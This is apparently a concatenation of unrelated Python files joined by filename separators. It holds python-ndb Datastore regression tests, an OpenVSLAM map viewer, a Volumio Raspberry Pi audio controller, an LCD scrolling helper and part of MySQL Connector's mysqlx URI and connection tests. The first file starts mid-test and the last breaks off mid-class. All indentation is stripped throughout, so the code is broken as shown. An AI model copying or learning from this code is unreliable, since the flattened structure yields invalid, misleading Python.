class SomeKind(ndb.Model):
foo = ndb.StringProperty(repeated=True)
entity = SomeKind(foo=["", ""])
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == ["", ""]
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
@pytest.mark.usefixtures("redis_context")
def test_multi_get_weirdness_with_redis(dispose_of):
"""Regression test for issue #294.
https://github.com/googleapis/python-ndb/issues/294
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
objects = [SomeKind(foo=str(i)) for i in range(10)]
keys = ndb.put_multi(objects)
for key in keys:
dispose_of(key._key)
ndb.get_multi(keys)
one_object = random.choice(keys).get()
one_object.foo = "CHANGED"
one_object.put()
objects_upd = ndb.get_multi(keys)
keys_upd = [obj.key for obj in objects_upd]
assert len(keys_upd) == len(keys)
assert len(set(keys_upd)) == len(set(keys))
assert set(keys_upd) == set(keys)
@pytest.mark.usefixtures("client_context")
def test_multi_with_lots_of_keys(dispose_of):
"""Regression test for issue #318.
https://github.com/googleapis/python-ndb/issues/318
"""
N = 1001
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
assert len(keys) == N
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
ndb.delete_multi(keys)
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_allocate_a_lot_of_keys():
N = 1001
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(N)
assert len(keys) == N
@pytest.mark.usefixtures("client_context")
def test_delete_multi_with_transactional(dispose_of):
"""Regression test for issue #271
https://github.com/googleapis/python-ndb/issues/271
"""
N = 10
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
@ndb.transactional()
def delete_them(entities):
ndb.delete_multi([entity.key for entity in entities])
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
assert delete_them(entities) is None
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_compressed_text_property(dispose_of, ds_client):
"""Regression test for #277
https://github.com/googleapis/python-ndb/issues/277
"""
class SomeKind(ndb.Model):
foo = ndb.TextProperty(compressed=True)
entity = SomeKind(foo="Compress this!")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "Compress this!"
ds_entity = ds_client.get(key._key)
assert zlib.decompress(ds_entity["foo"]) == b"Compress this!"
def test_insert_entity_with_repeated_local_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #326
https://github.com/googleapis/python-ndb/issues/326
"""
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.LocalStructuredProperty(OtherKind, repeated=True)
with client_context.new(legacy_data=True).use():
entity = SomeKind(
foo=42,
bar=[
OtherKind(one="hi", two="mom"),
OtherKind(one="and", two="dad"),
],
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "and"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
def test_insert_structured_property_with_unindexed_subproperty_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #341
https://github.com/googleapis/python-ndb/issues/341
"""
class OtherKind(ndb.Model):
data = ndb.BlobProperty(indexed=False)
class SomeKind(ndb.Model):
entry = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(entry=OtherKind(data=b"01234567890" * 1000))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.entry, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_serialization(dispose_of):
"""Regression test for #384
https://github.com/googleapis/python-ndb/issues/384
"""
# This is needed because pickle can't serialize local objects
global SomeKind, OtherKind
class OtherKind(ndb.Model):
foo = ndb.IntegerProperty()
@classmethod
def _get_kind(cls):
return "OtherKind"
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
@classmethod
def _get_kind(cls):
return "SomeKind"
entity = SomeKind(other=OtherKind(foo=1, namespace="Test"), namespace="Test")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.other.key is None or retrieved.other.key.id() is None
entity = pickle.loads(pickle.dumps(retrieved))
assert entity.other.foo == 1
@pytest.mark.usefixtures("client_context")
def test_custom_validator(dispose_of, ds_client):
"""New feature test for #252
https://github.com/googleapis/python-ndb/issues/252
"""
def date_validator(prop, value):
return datetime.datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(validator=date_validator)
entity = SomeKind(foo="2020-08-08 1:02:03")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2020, 8, 8, 1, 2, 3)
def test_cache_returns_entity_if_available(dispose_of, client_context):
"""Regression test for #441
https://github.com/googleapis/python-ndb/issues/441
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
somekind = SomeKind(foo=1)
key = somekind.put()
dispose_of(key._key)
query = ndb.Query(kind="SomeKind")
ourkind = query.get()
ourkind.bar = "confusing"
assert somekind.bar == "confusing"
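# With the default context cache enabled, query.get() returns the same in-memory
# instance that was put(), so the mutation through `ourkind` is visible via
# `somekind` as well.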
def test_cache_off_new_entity_created(dispose_of, client_context):
"""Regression test for #441
https://github.com/googleapis/python-ndb/issues/441
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
somekind = SomeKind(foo=1)
key = somekind.put()
dispose_of(key._key)
query = ndb.Query(kind="SomeKind")
ourkind = query.get()
ourkind.bar = "confusing"
assert somekind.bar is None
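# With the cache off, query.get() deserializes a fresh entity, so mutating it
# leaves the original instance untouched.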
@pytest.mark.usefixtures("client_context")
def test_local_structured_property_with_polymodel(dispose_of):
"""Regression test for #481
https://github.com/googleapis/python-ndb/issues/481
"""
class Base(ndb.PolyModel):
pass
class SubKind(Base):
foo = ndb.StringProperty()
class Container(ndb.Model):
child = ndb.LocalStructuredProperty(Base)
entity = Container(child=SubKind(foo="bar"))
key = entity.put()
dispose_of(key._key)
entity = entity.key.get()
assert entity.child.foo == "bar"
@pytest.mark.usefixtures("client_context")
def test_local_structured_property_with_inheritance(dispose_of):
"""Regression test for #523
https://github.com/googleapis/python-ndb/issues/523
"""
class Base(ndb.Model):
pass
class SubKind(Base):
foo = ndb.StringProperty()
class Container(ndb.Model):
children = ndb.LocalStructuredProperty(Base, repeated=True)
entity = Container()
subkind = SubKind(foo="bar")
entity.children.append(subkind)
key = entity.put()
dispose_of(key._key)
entity = entity.key.get()
assert isinstance(entity.children[0], Base)
def test_structured_property_with_nested_compressed_json_property_using_legacy_format(
client_context, dispose_of
):
"""Regression test for #602
https://github.com/googleapis/python-ndb/issues/602
"""
class OtherKind(ndb.Model):
data = ndb.JsonProperty(compressed=True)
class SomeKind(ndb.Model):
sub_model = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
model = SomeKind(sub_model=OtherKind(data={"test": 1}))
key = model.put()
dispose_of(key._key)
assert key.get().sub_model.data["test"] == 1
|
read_map.py | #!/usr/bin/env python3
import os
import sys
from threading import Thread
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d as plt3d
import msgpack
import numpy as np
import open3d as o3d
import pptk
import scipy.spatial.transform as sst
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import QObject, QUrl, pyqtSignal, pyqtProperty
from PyQt5.QtQuick import QQuickView
from PyQt5.QtWidgets import QWidget
QtCore.Signal = QtCore.pyqtSignal
def _change_frame(a):
""" (x, y, z) <- (x, z, -y) """
return np.concatenate((a[:, [0]], a[:, [2]], np.negative(a[:, [1]])), axis=1)
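# The swap above converts a y-down camera-style frame into a z-up frame that is
# easier to plot (an interpretation of the axis mapping in the docstring, not
# taken from upstream documentation).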
class MapInfo(QObject):
loadingChanged = pyqtSignal()
filenameChanged = pyqtSignal()
keypointCountChanged = pyqtSignal()
keyframeCountChanged = pyqtSignal()
visualiseTrajectory = pyqtSignal()
visualiseCloud = pyqtSignal()
exportCloud = pyqtSignal('QString')
def __init__(self, parent=None):
QObject.__init__(self, parent)
self._loading = False
self._filename = None
self._keypoint_count = 0
self._keyframe_count = 0
@pyqtProperty('bool', notify=loadingChanged)
def loading(self):
return self._loading
@loading.setter
def loading(self, status):
self._loading = status
self.loadingChanged.emit()
@pyqtProperty('int', notify=keyframeCountChanged)
def keyframeCount(self):
return self._keyframe_count
@keyframeCount.setter
def keyframeCount(self, n):
self._keyframe_count = n
self.keyframeCountChanged.emit()
@pyqtProperty('int', notify=keypointCountChanged)
def keypointCount(self):
return self._keypoint_count
@keypointCount.setter
def keypointCount(self, n):
self._keypoint_count = n
self.keypointCountChanged.emit()
@pyqtProperty('QString', notify=filenameChanged)
def filename(self):
return self._filename
@filename.setter
def filename(self, filename):
self._filename = filename.replace('file://', '')
self.filenameChanged.emit()
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setWindowTitle('Read OpenVSLAM map')
self.mapInfo = MapInfo()
qml_view = QQuickView()
qml_view.rootContext().setContextProperty('mapInfo', self.mapInfo)
qml_view.setSource(QUrl(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'read_map.qml')))
qml_view.setResizeMode(QQuickView.SizeRootObjectToView)
self.qml_gui = qml_view.rootObject()
qml_view_container = QWidget.createWindowContainer(qml_view, self)
qml_view_container.setMinimumSize(800, 200)
self.setCentralWidget(qml_view_container)
self.mapInfo.filenameChanged.connect(self.read_data)
self.mapInfo.visualiseCloud.connect(self.pptk)
self.mapInfo.visualiseTrajectory.connect(self.pyplot)
self.mapInfo.exportCloud.connect(self.export_cloud)
self.data = None
self.cloud = None
self.trajectory = None
def _get_landmarks(self):
landmarks = self.data[b'landmarks'].values()
cloud = np.ndarray([len(landmarks), 3], dtype=np.double)
for i, l in enumerate(landmarks):
cloud[i, :] = np.array(l[b'pos_w'])
self.cloud = _change_frame(cloud)
self.cloud_colour = np.repeat([[0.7, 0.7, 0.7]], cloud.shape[0], axis=0)
self.mapInfo.keypointCount = cloud.shape[0]
def _get_trajectory(self):
keyframes = self.data[b'keyframes']
keyframes = {ki: keyframes[b'%d' % ki] for ki in sorted([int(k) for k in keyframes.keys()])}
trajectory = np.ndarray([len(keyframes), 3], dtype=np.double)
for i, (k, f) in enumerate(keyframes.items()):
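# rot_cw/trans_cw give the world-to-camera transform; the camera centre in
# world coordinates is c_w = -R_cw^T @ t_cw, which the next two lines compute.
# (SciPy >= 1.6 renames Rotation.as_dcm() to as_matrix().)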
transform = -sst.Rotation.from_quat(f[b'rot_cw']).as_dcm().transpose()
trajectory[i, :] = np.matmul(transform, f[b'trans_cw'])
n = trajectory.shape[0]
self.mapInfo.keyframeCount = n
self.trajectory = _change_frame(trajectory)
self.trajectory_colour = np.array([[1 - x / n, 0.0, x / n] for x in range(1, n + 1)])
def read_data(self):
def thread_function():
with open(self.mapInfo.filename, 'rb') as f:
self.data = msgpack.unpack(f)
self._get_landmarks()
self._get_trajectory()
self.mapInfo.loading = False
thread = Thread(target=thread_function)
self.mapInfo.loading = True
thread.start()
def export_cloud(self, filename):
Thread(target=lambda: np.savetxt(filename.replace('file://', ''), self.cloud, delimiter=',')).start()
def open3d(self):
if not self.data:
return
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(np.concatenate((self.cloud, self.trajectory), axis=0))
pcd.colors = o3d.utility.Vector3dVector(np.concatenate((self.cloud_colour, self.trajectory_colour), axis=0))
o3d.visualization.draw_geometries([pcd])
def pyplot(self):
if not self.data:
return
fig = plt.figure()
ax = plt3d.Axes3D(fig)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
ax.scatter(self.trajectory[:, 0], self.trajectory[:, 1], self.trajectory[:, 2])
vrange = [np.min(self.trajectory), np.max(self.trajectory)]
ax.auto_scale_xyz(vrange, vrange, vrange)
plt.show()
def pptk(self):
if not self.data:
return
v = pptk.viewer(np.concatenate((self.cloud, self.trajectory), axis=0))
v.attributes(np.concatenate((self.cloud_colour, self.trajectory_colour), axis=0))
v.set(lookat=np.mean(self.cloud, axis=0), point_size=0.005)
if __name__ == '__main__':
application = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(application.exec_())
|
Old_AudioSupervisor.py | #!/usr/bin/python
from __future__ import unicode_literals
import json, sys
from socketIO_client import SocketIO
from time import time, sleep
from threading import Thread
from hardware import *
from modules.logger import *
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
log = Log(LOGLEVEL.INFO)
volumio_host = 'localhost'
volumio_port = 3000
VOLUME_DT = 5 # volume adjustment step
volumioIO = SocketIO(volumio_host, volumio_port)
STATE_NONE = -1
STATE_PLAYER = 0
STATE_PLAYLIST_MENU = 1
STATE_QUEUE_MENU = 2
STATE_VOLUME = 3
STATE_SHOW_INFO = 4
STATE_LIBRARY_MENU = 5
STATE_CLOCK = 6
DSP.state = STATE_NONE
DSP.stateTimeout = 0
DSP.timeOutRunning = True
DSP.activeSong = 'AMPI'
DSP.activeArtist = 'VOLUMIO'
DSP.playState = 'unknown'
DSP.playPosition = 0
DSP.ptime = 0
DSP.duration = 0
DSP.modal = False
DSP.playlistoptions = []
DSP.queue = []
DSP.libraryFull = []
DSP.libraryNames = []
DSP.volume = 0
DSP.source = None
emit_volume = False
emit_track = False
def LoadPlaylist(playlistname):
log.info("loading playlist: " + playlistname.encode('ascii', 'ignore'))
DSP.playPosition = 0
volumioIO.emit('playPlaylist', {'name': playlistname})
DSP.state = STATE_PLAYER
def onPushState(data):
newStatus = None
if 'trackType' in data:
s = data['trackType']
if s != DSP.source:
log.info("New source: " + str(s))
DSP.source = s
if 'title' in data:
newSong = data['title']
else:
newSong = ''
if newSong is None:
newSong = ''
if 'artist' in data:
newArtist = data['artist']
else:
newArtist = ''
if newArtist is None: # volumio can push NoneType
newArtist = ''
if 'position' in data: # current position in queue
DSP.playPosition = data['position'] # didn't work well with volumio ver. < 2.5
if 'status' in data:
newStatus = data['status']
if 'seek' in data:
DSP.ptime = data['seek']
NowPlayingScreen.ptime = DSP.ptime
if 'duration' in data:
DSP.duration = data['duration']
if DSP.state != STATE_VOLUME: # get volume on startup and remote control
try: # it is either number or unicode text
DSP.volume = int(data['volume'])
except (KeyError, ValueError):
pass
if 'disableVolumeControl' in data:
DSP.volumeControlDisabled = data['disableVolumeControl']
if (newSong != DSP.activeSong): # new song
log.info("New Song: " + "\033[94m" + newSong.encode('ascii', 'ignore') + "\033[0m")
DSP.activeSong = newSong
DSP.activeArtist = newArtist
if DSP.state == STATE_PLAYER and newStatus != 'stop':
DSP.modal.UpdatePlayingInfo(newArtist, newSong)
if newStatus != DSP.playState:
DSP.playState = newStatus
if DSP.state == STATE_PLAYER:
if DSP.playState == 'play':
iconTime = 35
else:
iconTime = 80
DSP.modal.SetPlayingIcon(DSP.playState, iconTime)
def onPushQueue(data):
DSP.queue = [track['name'] if 'name' in track else 'no track' for track in data]
log.info('Queue length is ' + str(len(DSP.queue)))
def onPushBrowseSources(data):
log.info('Browse sources:')
for item in data:
log.blue(item['uri'])
def onLibraryBrowse(data):
DSP.libraryFull = data
itemList = DSP.libraryFull['navigation']['lists'][0]['items']
DSP.libraryNames = [item['title'] if 'title' in item else 'empty' for item in itemList]
DSP.state = STATE_LIBRARY_MENU
def EnterLibraryItem(itemNo):
selectedItem = DSP.libraryFull['navigation']['lists'][0]['items'][itemNo]
log.info("Entering library item: " + DSP.libraryNames[itemNo].encode('ascii', 'ignore'))
if selectedItem['type'][-8:] == 'category' or selectedItem['type'] == 'folder':
volumioIO.emit('browseLibrary', {'uri': selectedItem['uri']})
else:
log.info("Sending new Queue")
volumioIO.emit('clearQueue') # clear queue and add whole list of items
DSP.queue = []
volumioIO.emit('addToQueue', DSP.libraryFull['navigation']['lists'][0]['items'])
DSP.stateTimeout = 5.0 # maximum time to load new queue
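# Busy-wait for the server to push the new queue; DSP.stateTimeout is assumed
# to be decremented elsewhere by the timeout thread, otherwise this loop would
# only exit once the queue arrives.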
while len(DSP.queue) == 0 and DSP.stateTimeout > 0.1:
sleep(0.1)
DSP.stateTimeout = 0.2
log.info("Play position = " + str(itemNo))
volumioIO.emit('play', {'value': itemNo})
def LibraryReturn(): # go to parent category
if 'prev' not in DSP.libraryFull['navigation']:
DSP.state = STATE_PLAYER
else:
parentCategory = DSP.libraryFull['navigation']['prev']['uri']
log.info("Navigating to parent category in library: " + parentCategory.encode('ascii', 'ignore'))
if parentCategory != '' and parentCategory != '/':
volumioIO.emit('browseLibrary', {'uri': parentCategory})
else:
DSP.state = STATE_PLAYER
def onPushListPlaylist(data):
global DSP
if len(data) > 0:
DSP.playlistoptions = data
"""
Startup initializer
"""
def _receive_thread():
volumioIO.wait()
receive_thread = Thread(target=_receive_thread, name="Receiver")
receive_thread.daemon = True
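# Daemon thread: volumioIO.wait() blocks forever, so it must not keep the
# process alive when the main thread exits.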
volumioIO.on('pushState', onPushState)
volumioIO.on('pushListPlaylist', onPushListPlaylist)
volumioIO.on('pushQueue', onPushQueue)
volumioIO.on('pushBrowseSources', onPushBrowseSources)
# volumioIO.on('pushBrowseLibrary', onLibraryBrowse)
# get list of Playlists and initial state
volumioIO.emit('listPlaylist')
volumioIO.emit('getState')
volumioIO.emit('getQueue')
#volumioIO.emit('getBrowseSources')
sleep(0.1)
try:
with open('DSPconfig.json', 'r') as f: # load last playing track number
config = json.load(f)
except IOError:
pass
else:
DSP.playPosition = config['track']
receive_thread.start()
def main():
global emit_volume, emit_track
while True:
if emit_volume:
emit_volume = False
log.info("Volume: " + str(DSP.volume))
volumioIO.emit('volume', DSP.volume)
DSP.state = STATE_VOLUME
DSP.stateTimeout = 0.01
if emit_track and DSP.stateTimeout < 4.5:
emit_track = False
try:
log.info('Track selected: ' + str(DSP.playPosition + 1) + '/' + str(len(DSP.queue)) + ' ' + DSP.queue[
DSP.playPosition].encode('ascii', 'ignore'))
except IndexError:
pass
volumioIO.emit('play', {'value': DSP.playPosition})
def defer():
try:
receive_thread.join(1)
DSP.cleanup()
log.info("System exit ok")
except Exception as err:
log.err("Defer Error: " + str(err))
if __name__ == '__main__':
try:
main()
except(KeyboardInterrupt, SystemExit):
defer() # TODO: make this work
|
lcd.py | from rpi_lcd import LCD as RPI_LCD
import math
import threading
import time
import unicodedata
import queue
class LCD(RPI_LCD):
def __init__(self, address=0x27, bus=1, width=20, rows=4):
self.playing = False
self.text_queue = queue.Queue()
threading.Thread(target=self.text_queue_worker, daemon=True).start()
if address is not None:
super(LCD, self).__init__(address, bus, width, rows)
else:
self.address = None
def text_queue_worker(self):
while True:
item = self.text_queue.get()
super().text(item[0], item[1], item[2])
self.text_queue.task_done()
def write(self, byte, mode=0):
if self.address is not None:
super().write(byte, mode)
def scroll_text(self, text, line, align='left'):
scrolling_text = text + ' ' * round(self.width/2) + text
text_length = len(text)
first_letter = 0
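# The text is duplicated with a gap so the sliding window below can wrap
# around seamlessly; first_letter cycles modulo (text_length + gap).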
while self.playing:
last_letter = first_letter + self.width
self.text_queue.put([scrolling_text[first_letter:last_letter], line, align])
time.sleep(0.5)
first_letter = (first_letter + 1) % (text_length + round(self.width/2))
def strip_accents(self, text):
return ''.join(c for c in unicodedata.normalize('NFKD', text) if unicodedata.category(c) != 'Mn')
def text(self, text, line, align='left'):
if self.address is not None:
self.playing = True
normalized_text = self.strip_accents(text)
if len(normalized_text) > self.width:
scroll_text = threading.Thread(target=self.scroll_text, name='Scroll Text', args=[normalized_text, line, align], daemon=True)
scroll_text.start()
else:
self.text_queue.put([text, line, align])
def get_time_string(self, time):
minutes = math.floor(time / 60)
seconds = time % 60
return f'{str(minutes).zfill(2)}:{str(seconds).zfill(2)}'
def timer(self, max_time, line, align):
current_time = 0
max_time_string = self.get_time_string(max_time)
self.playing = True
while current_time < max_time and self.playing:
current_time_string = self.get_time_string(current_time)
timer_string = current_time_string + ' / ' + max_time_string
self.text_queue.put([timer_string, line, align])
time.sleep(1)
current_time += 1
def display_timer(self, max_time, line, align='left'):
if self.address is not None:
timer = threading.Thread(target=self.timer, name='Timer', args=[max_time, line, align], daemon=True)
timer.start()
def get_text_line(self, text):
if self.address is not None:
return super().get_text_line(text)
return ''
def clear(self):
self.playing = False
if self.address:
super().clear() |
test_mysqlx_connection.py | # -*- coding: utf-8 -*-
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unittests for mysqlx.connection
"""
import logging
import os
import platform
import unittest
import sys
import tests
import time
import socket
import struct
import mysqlx
from threading import Thread
from time import sleep
from mysqlx.connection import SocketStream
from mysqlx.compat import STRING_TYPES
from mysqlx.errors import InterfaceError, OperationalError, ProgrammingError
from mysqlx.protocol import Message, MessageReaderWriter, Protocol
from mysqlx.protobuf import HAVE_MYSQLXPB_CEXT, mysqlxpb_enum, Protobuf
from mysql.connector.utils import linux_distribution
from mysql.connector.version import VERSION, LICENSE
if mysqlx.compat.PY3:
from urllib.parse import quote_plus, quote
else:
from urllib import quote_plus, quote
from .test_mysqlx_crud import drop_table
LOGGER = logging.getLogger(tests.LOGGER_NAME)
_URI_TEST_RESULTS = ( # (uri, result)
("127.0.0.1", None),
("localhost", None),
("domain.com", None),
("user:password@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33060,
"user": "user"}),
("user:password@127.0.0.1:33061", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33061,
"user": "user"}),
("user:@127.0.0.1", {"schema": "", "host": "127.0.0.1", "password": "",
"port": 33060, "user": "user"}),
("user:@127.0.0.1/schema", {"schema": "schema", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("user:@127.0.0.1/schema?use_pure=true", {"schema": "schema",
"host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user",
"use-pure": True}),
("user{0}:password{0}@127.0.0.1/schema?use_pure=true"
"".format(quote("?!@#$%/:")), {"schema": "schema", "host": "127.0.0.1",
"port": 33060, "user": "user?!@#$%/:",
"password": "password?!@#$%/:",
"use-pure": True}),
("mysqlx://user:@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("mysqlx://user:@127.0.0.1:33060/schema",
{"schema": "schema", "host": "127.0.0.1", "password": "", "port": 33060,
"user": "user"}),
("mysqlx://user@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1", None),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1",
{"schema": "", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1/schema",
{"schema": "schema", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("รกรฉ'รญ'รณรบ:unicode@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "unicode",
"port": 33060, "user": "รกรฉ'รญ'รณรบ"}),
("unicode:รกรฉ'รญ'รณรบ@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "รกรฉ'รญ'รณรบ",
"port": 33060, "user": "unicode"}),
("root:@[localhost, 127.0.0.1:88, [::]:99, [a1:b1::]]",
{"routers": [{"host": "localhost", "port": 33060},
{"host": "127.0.0.1", "port": 88},
{"host": "::", "port": 99},
{"host": "a1:b1::", "port": 33060}],
"user": "root", "password": "", "schema": ""}),
("root:@[a1:a2:a3:a4:a5:a6:a7:a8]]",
{"host": "a1:a2:a3:a4:a5:a6:a7:a8", "schema": "",
"port": 33060, "user": "root", "password": ""}),
("root:@localhost", {"user": "root", "password": "",
"host": "localhost", "port": 33060, "schema": ""}),
("root:@[a1:b1::]", {"user": "root", "password": "",
"host": "a1:b1::", "port": 33060, "schema": ""}),
("root:@[a1:b1::]:88", {"user": "root", "password": "",
"host": "a1:b1::", "port": 88, "schema": ""}),
("root:@[[a1:b1::]:88]", {"user": "root", "password": "",
"routers": [{"host": "a1:b1::", "port":88}], "schema": ""}),
("root:@[(address=localhost:99, priority=99)]",
{"user": "root", "password": "", "schema": "",
"routers": [{"host": "localhost", "port": 99, "priority": 99}]})
)
_ROUTER_LIST_RESULTS = ( # (uri, result)
("รกรฉ'รญ'รณรบ:unicode@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "unicode", "user": "รกรฉ'รญ'รณรบ"}),
("unicode:รกรฉ'รญ'รณรบ@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "รกรฉ'รญ'รณรบ", "user": "unicode"}),
("user:password@[127.0.0.1, localhost]", {"schema": "", "routers":
[{"host": "127.0.0.1", "port": 33060}, {"host": "localhost", "port":
33060}], "password": "password", "user": "user"}),
("user:password@[(address=127.0.0.1, priority=99), (address=localhost,"
"priority=98)]", {"schema": "", "routers": [{"host": "127.0.0.1",
"port": 33060, "priority": 99}, {"host": "localhost", "port": 33060,
"priority": 98}], "password": "password", "user": "user"}),
)
_PREP_STMT_QUERY = (
"SELECT p.sql_text, p.count_execute "
"FROM performance_schema.prepared_statements_instances AS p "
"JOIN performance_schema.threads AS t ON p.owner_thread_id = t.thread_id "
"AND t.processlist_id = @@pseudo_thread_id")
def file_uri(path, brackets=True):
if brackets:
return "{0}{1}".format(path[0], quote_plus(path[1:]))
return "({0})".format(path)
def build_uri(**kwargs):
uri = "mysqlx://{0}:{1}".format(kwargs["user"], kwargs["password"])
if "host" in kwargs:
host = "[{0}]".format(kwargs["host"]) \
if ":" in kwargs["host"] else kwargs["host"]
uri = "{0}@{1}".format(uri, host)
elif "routers" in kwargs:
routers = []
for router in kwargs["routers"]:
fmt = "(address={host}{port}, priority={priority})" \
if "priority" in router else "{host}{port}"
host = "[{0}]".format(router["host"]) if ":" in router["host"] \
else router["host"]
port = ":{0}".format(router["port"]) if "port" in router else ""
routers.append(fmt.format(host=host, port=port,
priority=router.get("priority", None)))
uri = "{0}@[{1}]".format(uri, ",".join(routers))
else:
raise ProgrammingError("host or routers required.")
if "port" in kwargs:
uri = "{0}:{1}".format(uri, kwargs["port"])
if "schema" in kwargs:
uri = "{0}/{1}".format(uri, kwargs["schema"])
query = []
if "ssl_mode" in kwargs:
query.append("ssl-mode={0}".format(kwargs["ssl_mode"]))
if "ssl_ca" in kwargs:
query.append("ssl-ca={0}".format(kwargs["ssl_ca"]))
if "ssl_cert" in kwargs:
query.append("ssl-cert={0}".format(kwargs["ssl_cert"]))
if "ssl_key" in kwargs:
query.append("ssl-key={0}".format(kwargs["ssl_key"]))
if "use_pure" in kwargs:
query.append("use-pure={0}".format(kwargs["use_pure"]))
if "connect_timeout" in kwargs:
query.append("connect-timeout={0}".format(kwargs["connect_timeout"]))
if "connection_attributes" in kwargs:
conn_attrs = kwargs["connection_attributes"]
if isinstance(conn_attrs, STRING_TYPES) and \
not (conn_attrs.startswith("[") and conn_attrs.endswith("]")):
query.append("connection-attributes={}"
"".format(kwargs["connection_attributes"]))
else:
attr_list = []
for key in conn_attrs:
attr_list.append("{}={}".format(key, conn_attrs[key]))
query.append("connection-attributes={0}"
"".format("[{}]".format(",".join(attr_list))))
if len(query) > 0:
uri = "{0}?{1}".format(uri, "&".join(query))
return uri
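# Illustrative example (not part of the test data), assuming an IPv6 host:
# build_uri(user="root", password="", host="::1", port=33060)
# returns "mysqlx://root:@[::1]:33060"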
class ServerSocketStream(SocketStream):
def __init__(self):
self._socket = None
def start_receive(self, host, port):
"""Opens a sokect to comunicate to the given host, port
Args:
host (str): host name.
port (int): host port.
Returns:
address of the connected peer
"""
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.bind((host, port))
# Start listening and accept a single connection...
if sys.version_info > (3, 5):
my_sock.listen()
else:
my_sock.listen(1)
self._socket, addr = my_sock.accept()
return addr
class ServerProtocol(Protocol):
def __init__(self, reader_writer):
super(ServerProtocol, self).__init__(reader_writer)
def send_auth_continue_server(self, auth_data):
"""Send Server authenticate continue.
Args:
auth_data (str): Authentication data.
"""
msg = Message("Mysqlx.Session.AuthenticateContinue",
auth_data=auth_data)
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_CONTINUE"), msg)
